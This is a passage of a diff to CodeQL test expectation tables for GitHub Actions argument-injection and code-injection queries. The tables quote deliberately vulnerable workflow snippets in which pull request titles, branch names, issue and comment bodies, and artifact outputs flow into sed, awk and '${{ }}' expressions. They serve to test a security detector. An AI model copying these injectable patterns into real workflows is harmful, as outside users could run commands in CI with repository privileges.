bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 4a2950d84ae..dad99f0029a 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -613,154 +613,154 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | .github/workflows/composite-action-caller-1.yml | -| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | .github/workflows/argus_case_study.yml | -| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning1.yml | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning2.yml | -| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning3.yml | -| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning4.yml | -| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning5.yml | -| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | -| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | -| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning7.yml | -| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning8.yml | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | -| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | .github/workflows/image_link_generator.yml | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | -| .github/workflows/json_wrap.yml:23:31:23:68 | 